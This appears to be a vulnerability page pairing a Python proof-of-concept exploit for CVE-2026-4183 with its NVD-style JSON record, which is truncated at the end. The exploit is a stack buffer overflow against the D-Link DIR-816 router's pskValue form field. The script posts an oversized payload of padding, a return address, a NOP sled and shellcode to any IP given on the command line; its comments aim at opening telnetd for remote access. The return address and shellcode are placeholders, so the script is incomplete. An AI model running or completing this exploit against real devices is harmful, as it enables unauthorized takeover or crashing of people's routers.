CVE-2026-4183

#!/usr/bin/env python3 """ CVE-2026-4183 PoC - D-Link DIR-816 Stack Buffer Overflow Affected: D-Link DIR-816 1.10CNB05 Component: /goform/form2WlanBasicSetup.cgi Parameter: pskValue """ import requests import sys TARGET = "http://{target_ip}/goform/form2WlanBasicSetup.cgi" def create_exploit_payload(): # Buffer size for overflow (adjust based on target) # Typical stack buffer size in embedded devices: 256-1024 bytes buffer_size = 1024 # Create overflow payload with NOP sled + shellcode + return address # Padding to reach buffer boundary padding = b'A' * buffer_size # Return address (needs to be adjusted for target) # Common approach: point to NOP sled or shellcode return_addr = b'\x42\x42\x42\x42' # Placeholder - need to find correct address # NOP sled for reliable exploitation nop_sled = b'\x90' * 100 # Simple shellcode - executes telnetd for remote access # This is a placeholder, actual shellcode depends on target architecture (MIPS typically) shellcode = b'\x00' * 50 payload = padding + return_addr + nop_sled + shellcode return payload def exploit(target_ip): print(f"[*] Target: {target_ip}") print(f"[*] Exploiting CVE-2026-4183...") # Construct malicious request payload = create_exploit_payload() # POST data with overflow in pskValue parameter data = { 'pws': 'admin', 'pskValue': payload.decode('latin-1'), # Send overflow payload 'wlanMode': 'ap', 'ssid': 'TestSSID', 'channel': '6', 'bandwidth': '20', 'submit': 'Apply' } try: print(f"[*] Sending malicious request...") response = requests.post( TARGET.format(target_ip=target_ip), data=data, timeout=10 ) print(f"[*] Response Status: {response.status_code}") print(f"[*] Exploit sent. Check if shell is available on target.") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False return True if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) exploit(sys.argv[1])

{"cve": {"id": "CVE-2026-4183", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:59.250", "lastModified": "2026-03-19T19:56:48.130", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in D-Link DIR-816 1.10CNB05. Affected is an unknown function of the file /goform/form2WlanBasicSetup.cgi of the component goahead. Such manipulation of the argument pskValue leads to stack-based buffer overflow. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en D-Link DIR-816 1.10CNB05. Afectada es una función desconocida del archivo /goform/form2WlanBasicSetup.cgi del componente goahead. Tal manipulación del argumento pskValue conduce a desbordamiento de búfer basado en pila. El ataque puede ser ejecutado remotamente. El exploit ha sido divulgado públicamente y puede ser usado. Esta vulnerabilidad solo afecta productos que ya no son soportados por el mantenedor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 10.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-816_firmware:1.10cnb05:*:*:*:*:*:*:*", "matchCriteriaId": "6A221E99-E2B0-4C57-9263-9A86EFF8746E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-816:-:*:*:*:*:*:*:*", "matchCriteriaId": "B54058C1-B58F-434A-ABF0-A6B314A1AB14"}]}]}], "references": [{"url": "https://github.com/wudipjq/my_vuln/blob/main/D-Link7/vuln_87/87.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.351087", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.351087", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.769831", "source": "cna ... (truncated)